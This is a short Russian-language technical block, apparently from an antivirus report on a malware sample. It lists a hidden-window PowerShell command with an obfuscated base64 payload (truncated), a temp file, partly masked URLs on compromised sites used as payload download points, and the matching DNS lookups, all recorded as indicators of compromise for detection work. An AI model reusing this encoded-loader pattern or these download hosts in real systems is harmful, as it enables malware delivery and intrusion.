Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8ANAB5AHcAdAB1AD0AKAAnAEUAJwArACcANwA4ACcAKwAoACcAbAAnACsAJwA1AG8AZgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAUgBQAHIAbwBGAEkATABFAFwAcgBiAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1194764.cvr
- http://ed####edoors.com/wp-includes/nN/
- http://el###falgar.com/wp-includes/uYK/
- http://el###ivers.com/tpv/DXo/
- http://en####ofutbol.com/C2/
- http://fc#.net/wentzville/maK/
- http://ea####ipping.com/cgi-bin/Ym/
- DNS ASK ed####edoors.com
- DNS ASK el###falgar.com
- DNS ASK el###ivers.com
- DNS ASK en####ofutbol.com
- DNS ASK fc#.net
- DNS ASK fl#####quitectura.com
- DNS ASK ea####ipping.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8ANAB5AHcAdAB1AD0AKAAnAEUAJwArACcANwA4ACcAKwAoACcAbAAnACsAJwA1AG8AZgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAUgBQAHIAbwBGAEkATABFAFwAcgBiAE...' (со скрытым окном)